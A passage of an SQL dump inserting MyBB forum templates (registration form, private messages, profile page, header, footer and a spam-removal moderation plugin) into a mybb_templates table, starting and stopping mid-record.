action=\"refer.php\" method=\"post\" name=\"refer\" id=\"refer\">\n<table border=\"0\" cellspacing=\"1\" width=\"75%\" cellpadding=\"4\">\n<tr align=\"left\">\n<td>\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->details}</strong></legend>\n<label for=\"emailaddress\">{$lang->email}</label><br />\n<input class=\"text\" name=\"email\" type=\"text\" id=\"emailaddress\" value=\"{$email}\" size=\"40\" /></fieldset>\n</td>\n</tr>\n<tr align=\"left\">\n<td>\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->message}</strong></legend>\n<div>{$refermessage}<div>\n</fieldset>\n</td>\n</tr>\n<tr align=\"left\">\n<td>\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->addmessage}</strong></legend>\n<textarea name=\"addmessage\" cols=\"60\" rows=\"8\" id=\"addmessage\">{$addmessage}</textarea>\n</fieldset>\n{$regimage}\n</td>\n</tr>\n</table>\n<input class=\"button\" name=\"send\" type=\"submit\" id=\"send\" value=\"Send\" />\n<input name=\"action\" type=\"hidden\" value=\"do_send_refer\" />\n<input name=\"my_post_key\" type=\"hidden\" value=\"$mybb->post_code\" />\n</form>\n</td>\n</tr>\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->referlinktitle}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\"><textarea cols=\"100\">{$referlink}</textarea></td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-1', '1.0', '', '1346459916'); INSERT INTO mybb_templates VALUES('2031', 'goodbyespammer_option_checkbox', '<tr>\n <td class=\"{$altbg}\" width=\"99%\"><label for=\"actions_{$action}\"><strong>{$title}</strong></label><br />{$description}</td>\n <td class=\"{$altbg}\" width=\"1%\" align=\"center\"><input type=\"checkbox\" name=\"actions[{$action}]\" id=\"actions_{$action}\" value=\"1\"{$checked}{$disabled} /></td>\n</tr>', '-1', '1600', '', '1346459787'); INSERT INTO mybb_templates VALUES('2032', 'goodbyespammer_option_textbox', '<tr>\n <td class=\"{$altbg}\" width=\"100%\" colspan=\"2\"><label for=\"actions_{$action}\"><strong>{$title}</strong></label><br />{$description}<br /><input type=\"text\" name=\"actions[{$action}]\" id=\"actions_{$action}\" value=\"{$text}\" /></td>\n</tr>', '-1', '1600', '', '1346459787'); INSERT INTO mybb_templates VALUES('2033', 'goodbyespammer_profile_link', '<tr>\n<td class=\"trow1\">\n<a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=goodbyespammer&amp;uid={$memprofile[\'uid\']}\">{$lang->goodbyespammer_profile}</a>\n</td>\n</tr>', '-1', '1600', '', '1346459787'); INSERT INTO mybb_templates VALUES('2030', 'goodbyespammer', '<html>\n<head>\n<title>{$lang->goodbyespammer}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form method=\"post\" action=\"misc.php\">\n<input type=\"hidden\" name=\"action\" value=\"do_goodbyespammer\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->goodbyespammer_actionstotake}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\">{$lang->goodbyespammer_desc}</td>\n</tr>\n{$options}\n<tr>\n<td class=\"tfoot\" colspan=\"2\" align=\"center\"><input type=\"submit\" value=\"{$lang->goodbyespammer_submit}\" /></td>\n</tr>\n</table>\n<input type=\"hidden\" name=\"uid\" value=\"{$mybb->input[\'uid\']}\" />\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n</form>\n{$footer}\n</body>\n</html>', '-1', '1600', '', '1346459787'); INSERT INTO mybb_templates VALUES('1907', 'member_profile_modoptions', '\n<br /><table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->mod_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<ul>\n<li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_in_mcp}</a></li>\n<li><a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=banuser&amp;uid={$uid}\">{$lang->ban_in_mcp}</a></li>\n</ul>\n</td>\n</tr>\n<tr>\n<td class=\"trow2\">\n{$memprofile[\'usernotes\']}<br />\n<a href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_usernotes}</a>\n</td>\n</tr>\n{goodbyespammer}</table>\n', '1', '1608', '', '1339993817'); INSERT INTO mybb_templates VALUES('1951', 'member_register', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->registration}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/validator.js\"></script>\n</head>\n<body>\n{$header}\n<br />\n<form action=\"member.php\" method=\"post\" id=\"registration_form\"><input type=\"text\" style=\"visibility: hidden;\" value=\"\" name=\"regcheck1\" /><input type=\"text\" style=\"visibility: hidden;\" value=\"true\" name=\"regcheck2\" />\n{$regerrors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->registration}</strong></td>\n</tr>\n<tr>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->account_details}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"username\">{$lang->username}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 100%\" value=\"{$username}\" /></td>\n</tr>\n{$passboxes}\n<tr>\n<td><span class=\"smalltext\"><label for=\"email\">{$lang->email}</label></span></td>\n<td><span class=\"smalltext\"><label for=\"email2\">{$lang->confirm_email}</label></span></td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"email\" id=\"email\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email}\" /></td>\n<td><input type=\"text\" class=\"textbox\" name=\"email2\" id=\"email2\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email2}\" /></td>\n</tr>\n<tr>\n <td colspan=\"2\" style=\"display: none;\" id=\"email_status\">&nbsp;</td>\n</tr>\n{$hiddencaptcha}\n</table>\n</fieldset>\n{$requiredfields}\n{$referrer}\n{$regimage}\n</td>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->account_prefs}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"hideemail\">{$lang->hide_email}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"emailpmnotify\" id=\"emailpmnotify\" value=\"1\" {$emailpmnotifycheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"emailpmnotify\">{$lang->email_notify_newpm}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\">\n <select name=\"subscriptionmethod\" id=\"subscriptionmethod\">\n <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option>\n <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option>\n <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option>\n </select>\n</td>\n</tr>\n\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong><label for=\"timezone\">{$lang->time_offset}</label></strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td>\n</tr>\n<tr>\n<td>{$tzselect}</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->dst_correction}</span></td>\n</tr>\n<tr>\n<td>\n <select name=\"dstcorrection\">\n <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option>\n <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option>\n <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option>\n </select>\n</td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong><label for=\"language\">{$lang->lang_select}</label></strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->lang_select_desc}</span></td>\n</tr>\n<tr>\n<td><select name=\"language\" id=\"language\"><option value=\"\">{$lang->lang_select_default}</option><option value=\"\">-----------</option>{$langoptions}</select></td>\n</tr>\n</table>\n</fieldset>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"step\" value=\"registration\" />\n<input type=\"hidden\" name=\"action\" value=\"do_register\" />\n<input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->submit_registration}\" />\n</div>\n</form>\n<script type=\"text/javascript\">\n<!--\n regValidator = new FormValidator(\'registration_form\');\n regValidator.register(\'username\', \'notEmpty\', {failure_message:\'{$lang->js_validator_no_username}\'});\n regValidator.register(\'email\', \'regexp\', {match_field:\'email2\', regexp:\'^([a-zA-Z0-9_\\\\.\\\\+\\\\-])+\\\\@(([a-zA-Z0-9\\\\-])+\\\\.)+([a-zA-Z0-9]{2,4})+$\', failure_message:\'{$lang->js_validator_invalid_email}\'});\n regValidator.register(\'email2\', \'matches\', {match_field:\'email\', status_field:\'email_status\', failure_message:\'{$lang->js_validator_email_match}\'});\n{$validator_extra}\n regValidator.register(\'username\', \'ajax\', {url:\'xmlhttp.php?action=strictUsername_Validate\', loading_message:\'{$lang->js_validator_checking_username}\'}); // needs to be last\n// -->\n</script>\n{$footer}\n</body>\n</html>', '1', '1608', '', '1342193829'); INSERT INTO mybb_templates VALUES('1953', 'header_welcomeblock_guest', '<div id=\"panel\">\r\n<script type=\"text/javascript\">\r\n<!--\r\n lang.username = \"{$lang->login_username}\";\r\n lang.password = \"{$lang->login_password}\";\r\n lang.login = \"{$lang->login}\";\r\n lang.lost_password = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=lostpw\\\">{$lang->lost_password}<\\/a>\";\r\n lang.register_url = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=register\\\">{$lang->welcome_register}<\\/a>\";\r\n lang.remember_me = \"{$lang->remember_me}\";\r\n// -->\r\n</script>\r\n<span style=\"float: right;\">{$lang->welcome_current_time}</span>\r\n <span id=\"quick_login\">{$lang->welcome_guest} (<a href=\"{$mybb->settings[\'bburl\']}/member.php?action=login\" onclick=\"MyBB.quickLogin(); return false;\"><span style=\"color: white;\">{$lang->welcome_login}</span></a> &mdash; <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=register\"><span style=\"color: white;\">{$lang->welcome_register}</span></a>)</span>\r\n</div>', '8', '1608', '', '1345052930'); INSERT INTO mybb_templates VALUES('1954', 'private', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->private_messaging}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\" name=\"pmForm\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\">\n<tr>\n<td class=\"trow1\">\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\n<tr>\n<td>{$pmspacebar}<span class=\"smalltext\"><a href=\"private.php\">{$lang->inbox}</a> | <a href=\"private.php?action=send\">{$lang->compose_message2}</a> | <a href=\"private.php?action=folders\">{$lang->manage_folders}</a> | <a href=\"private.php?action=empty\">{$lang->empty_folders2}</a> | <a href=\"private.php?action=export\">{$lang->export_messages2}</a></span></td>\n</tr>\n</table>\n</td>\n</tr>\n</table>\n<br />\n{$limitwarning}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"6\">\n <div class=\"float_right\">\n <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" />\n <input type=\"submit\" class=\"button\" name=\"quick_search\" value=\"{$lang->search_pms}\" />\n (<a href=\"private.php?action=advanced_search\">{$lang->advanced_search}</a>)</div>\n <strong>{$lang->pms_in_folder}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"30%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$sender}</strong></span></td>\n<td class=\"tcat\" align=\"right\" width=\"20%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->date_sent}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input name=\"allbox\" title=\"{$lang->check_all}\" type=\"checkbox\" class=\"checkbox checkall\" value=\"{$lang->check_all}\" /></span></td>\n</tr>\n{$messagelist}\n<tr>\n<td class=\"tfoot\" align=\"right\" colspan=\"6\">\n<input type=\"submit\" class=\"button\" name=\"moveto\" value=\"{$lang->move_to}\" /> {$folderoplist} {$lang->or}\n<input type=\"submit\" class=\"button\" name=\"delete\" value=\"{$lang->delete}\" /> {$lang->selected_messages}\n</td>\n</tr>\n</table>\n<br />\n<div class=\"float_left\">{$multipage}</div>\n<div class=\"float_right\">\n<span class=\"smalltext\">\n<strong>{$lang->jump_folder} {$folderjump}\n<input type=\"submit\" class=\"button\" name=\"hop\" value=\"{$lang->go}\" />\n</strong>\n</span>\n</div>\n</td>\n</tr>\n</table>\n<input type=\"hidden\" name=\"action\" value=\"do_stuff\" />\n</form>\n{$footer}\n</body>\n</html>', '8', '1501', '', '1343925064'); INSERT INTO mybb_templates VALUES('1955', 'forumbit_depth1_cat', '<div id=\"tabmenu_{$forum[\'fid\']}\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<thead>\r\n<tr>\r\n<td class=\"thead\" colspan=\"6\">\r\n<div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"cat_{$forum[\'fid\']}_img\" class=\"expander\" alt=\"{$expaltext}\" title=\"{$expaltext}\" /></div>\r\n<div><strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong> - <small>{$forum[\'description\']}</small></div>\r\n</td>\r\n</tr>\r\n</thead>\r\n<tbody style=\"{$expdisplay}\" id=\"cat_{$forum[\'fid\']}_e\">\r\n<tr>\r\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td>\r\n<td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td>\r\n<td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td>\r\n<td class=\"tcat\" width=\"200\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td>\r\n</tr>\r\n{$sub_forums}\r\n</tbody>\r\n</table>\r\n<br /></div>', '8', '1608', '', '1344010489'); INSERT INTO mybb_templates VALUES('1956', 'forumbit_depth2_forum', '<tr>\r\n<td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"uploads/ficons/{$forum[\'ficon\']}\" alt=\"{$forum[\'name\']}\" /></td>\r\n<td class=\"{$bgcolor}\">\r\n<strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$modlist}{$subforums}</div>\r\n</td>\r\n<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td>\r\n<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td>\r\n<td class=\"{$bgcolor}\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td>\r\n</tr>', '8', '1608', '', '1344010431'); INSERT INTO mybb_templates VALUES('1957', 'header_welcomeblock_member', '<div id=\"panel\"><span style=\"float:right; color: white;\">{$lang->welcome_current_time}</span>\r\n {$lang->welcome_back} (<a href=\"{$mybb->settings[\'bburl\']}/usercp.php\" class=\"\"><b><span style=\"color: white;\">{$lang->welcome_usercp}</span></b></a> — <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\"><i><span style=\"color: white;\">{$lang->welcome_logout}</span></i></a> {$modcplink} {$admincplink})<br />\r\n<span style=\"float:right;\">\r\n <a href=\"#\" onclick=\"MyBB.popupWindow(\'{$mybb->settings[\'bburl\']}/misc.php?action=buddypopup\', \'buddyList\', 350, 350);\"><span style=\"color: white;\">{$lang->welcome_open_buddy_list}</span></a>\r\n</span>\r\n <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getnew\"><span style=\"color: white;\">{$lang->welcome_newposts}</span></a> | \r\n <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getdaily\"><span style=\"color: white;\">{$lang->welcome_todaysposts}</span></a> |\r\n <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=finduser&uid={$mybb->user[\'uid\']}\" class=\"\"><span style=\"color: white;\">View Your Posts</span></a> |\r\n <a href=\"{$mybb->settings[\'bburl\']}/search.php?action=finduserthreads&uid={$mybb->user[\'uid\']}\" class=\"\"><span style=\"color: white;\">View Your Threads</span></a> | \r\n <a href=\"{$mybb->settings[\'bburl\']}/private.php\"><span style=\"color: white;\">{$lang->welcome_pms}</span></a> {$lang->welcome_pms_usage}\r\n</div>', '8', '1608', '', '1350849441'); INSERT INTO mybb_templates VALUES('1958', 'header', '<div id=\"container\">\r\n <a name=\"top\" id=\"top\"></a>\r\n <div id=\"header\">\r\n <div class=\"logo\" style=\"margin:0 auto;text-align:center\"><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" /></a></div>\r\n <div class=\"menu\">\r\n <ul><center> \r\n <li><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/home.png\" />\r\nHome</a></li>\r\n <li><a href=\"{$mybb->settings[\'bburl\']}/upgrade.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/upgrade.png\" />Upgrade</a></li>\r\n <li><a href=\"{$mybb->settings[\'bburl\']}/search.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/search.png\" />{$lang->toplinks_search}</a></li>\r\n <li><a href=\"{$mybb->settings[\'bburl\']}/memberlist.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/member.png\" />{$lang->toplinks_memberlist}</a></li>\r\n <li><a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help\"><img src=\"{$theme[\'imgdir\']}/toplinks/help.png\" />{$lang->toplinks_help}</a></li>\r\n <li><a href=\"{$mybb->settings[\'bburl\']}/contact.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/contact.png\" />Contact</a></li>\r\n <center></ul>\r\n </div>\r\n </div>\r\n <hr class=\"hidden\" />\r\n {$welcomeblock}\r\n <hr class=\"hidden\" />\r\n <br class=\"clear\" />\r\n <div id=\"content\">\r\n {$pm_notice}\r\n {$bannedwarning}\r\n {$bbclosedwarning}\r\n {$unreadreports}{$moderation_posts}\r\n {$pending_joinrequests}\r\n <navigation>\r\n{$affiliates_header}\r\n <br />', '8', '1608', '', '1350855264'); INSERT INTO mybb_templates VALUES('1959', 'footer', '<br />\r\n <div class=\"bottommenu\">\r\n <div class=\"float_right\">{$lang_select}</div>\r\n <div>\r\n <span class=\"smalltext\"><a href=\"{$mybb->settings[\'contactlink\']}\">{$lang->bottomlinks_contactus}</a> | <a href=\"{$mybb->settings[\'homeurl\']}\">{$mybb->settings[\'homename\']}</a> | <a href=\"#top\">{$lang->bottomlinks_returntop}</a> | <a href=\"#content\">{$lang->bottomlinks_returncontent}</a> | <a href=\"<archive_url>\">{$lang->bottomlinks_litemode}</a> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=syndication\">{$lang->bottomlinks_syndication}</a> | <a href=\"{$mybb->settings[\'bburl\']}/advertisements.php\">Advertise</a></span> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help&hid=16\">Legal Policies</a></span> \r\n </div>\r\n </div>\r\n </div>\r\n <hr class=\"hidden\" />\r\n <div id=\"copyright\">\r\n <div id=\"debug\"><debugstuff></div>\r\n <!-- MyBB is free software developed and maintained by a volunteer community. \r\n It would be much appreciated by the MyBB Group if you left the full copyright and \"powered by\" notice intact, \r\n to show your support for MyBB. If you choose to remove or modify the copyright below, \r\n you may be refused support on the MyBB Community Forums.\r\n \r\n This is free software, support us and we\'ll support you. -->\r\n{$lang->powered_by} <a href=\"http://mybb.com\" target=\"_blank\">MyBB{$mybbversion}</a>, &copy; 2002-{$copy_year} <a href=\"http://mybb.com\" target=\"_blank\">MyBB Group</a>.\r\n <!-- End powered by -->\r\n <br />\r\n<br class=\"clear\" />\r\n<!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code -->\r\n{$auto_dst_detection}\r\n{$affiliates}\r\n </div>\r\n </div>', '8', '1608', '', '1346969476'); INSERT INTO mybb_templates VALUES('1960', 'member_profile', '<html>\r\n<head>\r\n<title>{$mybb->settings[\'bbname\']} - {$lang->profile}</title>\r\n{$headerinclude}\r\n</head>\r\n<body>\r\n{$header}\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder1\">\r\n<tr>\r\n<td class=\"trow1\">\r\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tr><td class=\"\" width=\"75%\">\r\n<span class=\"largetext\"><strong>{$formattedname}</strong></span><br />\r\n<span class=\"smalltext\">\r\n({$usertitle})<br />\r\n{$groupimage}\r\n{$userstars}<br />\r\n<br />\r\n<strong>{$lang->registration_date}</strong> {$memregdate}<br />\r\n<strong>{$lang->date_of_birth}</strong> {$membday} {$membdayage}<br />\r\n<strong>{$lang->local_time}</strong> {$localtime}<br />\r\n<strong>{$lang->postbit_status}</strong> {$online_status}\r\r\n\r\n</span>\r\n</td><td width=\"25%\" align=\"right\" valign=\"middle\">{$avatar}</td></tr></table>\r\n</td>\r\n</tr>\r\n{$awaybit}\r\n</table>\r\n<br />\r\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\">\r\n<tr>\r\n<td width=\"50%\" valign=\"top\">\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->users_forum_info}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\"><strong>{$lang->joined}</strong></td>\r\n<td class=\"trow1\">{$memregdate}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow2\"><strong>{$lang->lastvisit}</strong></td>\r\n<td class=\"trow2\">{$memlastvisitdate} {$memlastvisittime}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\"><strong>{$lang->total_posts}</strong></td>\r\n<td class=\"trow1\">{$memprofile[\'postnum\']} ({$lang->ppd_percent_total})<br /><span class=\"smalltext\">(<a href=\"search.php?action=finduserthreads&amp;uid={$uid}\">{$lang->find_threads}</a> &mdash; <a href=\"search.php?action=finduser&amp;uid={$uid}\">{$lang->find_posts}</a>)</span></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow2\"><strong>{$lang->timeonline}</strong></td>\r\n<td class=\"trow2\">{$timeonline}</td>\r\n</tr>\r\n{$referrals}\r\n{$reputation}\r\n{$easyrefer}\r\n\r\n{$repoco}\r\n\r\n{$warning_level}\r\n</table>\r\n<br />\r\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\r\n<tr>\r\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->users_contact_details}</strong></td>\r\n</tr>\r\n<tr>\r\n<td class=\"trow1\"><strong>{$lang->homepage}</strong></td>\r\n<td class=\"trow1\">{$website}</td>\r\n</tr>\r\n{$sendemail}\r\n<tr>\r\n<td class=\"{$bgcolors[\'pm\']}\"><strong>{$lang->pm}</strong></td>\r\n<td class=\"{$bgcolors[\'pm\']}\"><a href=\"private.php?action=send&amp;uid={$memprofile[\'uid\']}\">{$lang->send_pm}</a></td>\r\n</tr>\r\n<tr>\r\n<td class=\"{$bgcolors[\'icq\']}\"><strong>{$lang->icq_number}</strong></td>\r\n<td class=\"{$bgcolors[\'icq\']}\">{$memprofile[\'icq\']}</td>\r\n</tr>\r\n<tr>\r\n<td class=\"{$bgcolors[\'aim\']}\"><strong>{$lang->aim_screenname}</strong></td>\r\n<td class=\"{$bgcolors[\'aim\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=aim&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'aim\']}</a></td>\r\n</tr>\r\n<tr>\r\n<td class=\"{$bgcolors[\'yahoo\']}\"><strong>{$lang->yahoo_id}</strong></td>\r\n<td class=\"{$bgcolors[\'yahoo\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=yahoo&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'yahoo\']}</a></td>\r\n</tr>\r\n<tr>\r\n<td class=\"{$bgcolors[\'msn\']}\"><strong>{$lang->msn}</strong></td>\r\n<td class=\"{$bgcolors[\'msn\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=msn&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'msn\']}</a></td>\r\n</tr>\r\n</table>\r\n</td>\r\n<td><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"8\" alt=\"\"/></td>\r\n<td width=\"50%\" valign=\"top\">\r\n{$profilefields}<!-- Profile_achivements -->{$achivementsprofile}<!-- /Profile_achivements -->\r\n{$signature}\r\n{$modoptions}\r\n{$adminoptions}\r\n{$buddy_options}\r\n</td>\r\n</tr>\r\n</table>\r\n{$footer}\r\n</body>\r\n</html>', '8', '1608', '', '1350794045'); INSERT INTO mybb_templates VALUES('1961', 'showthread', '<html>\r\n<head>\r\n<title>{$thread[\'subject\']}{$google_seo_page}</title>\r\n{$headerinclude}\r\n<script type=\"text/javascript\">\r\n<!--\r\n var quickdelete_confirm = \"{$lang->quickdelete_confirm}\";\r\n// -->\r\n</script>\r\n<script type=\"text/javascript\" src=\"jscripts/thread.js?ver=1400\"></script>\r\n</head>\r\n<body>\r\n {$header}\r\n 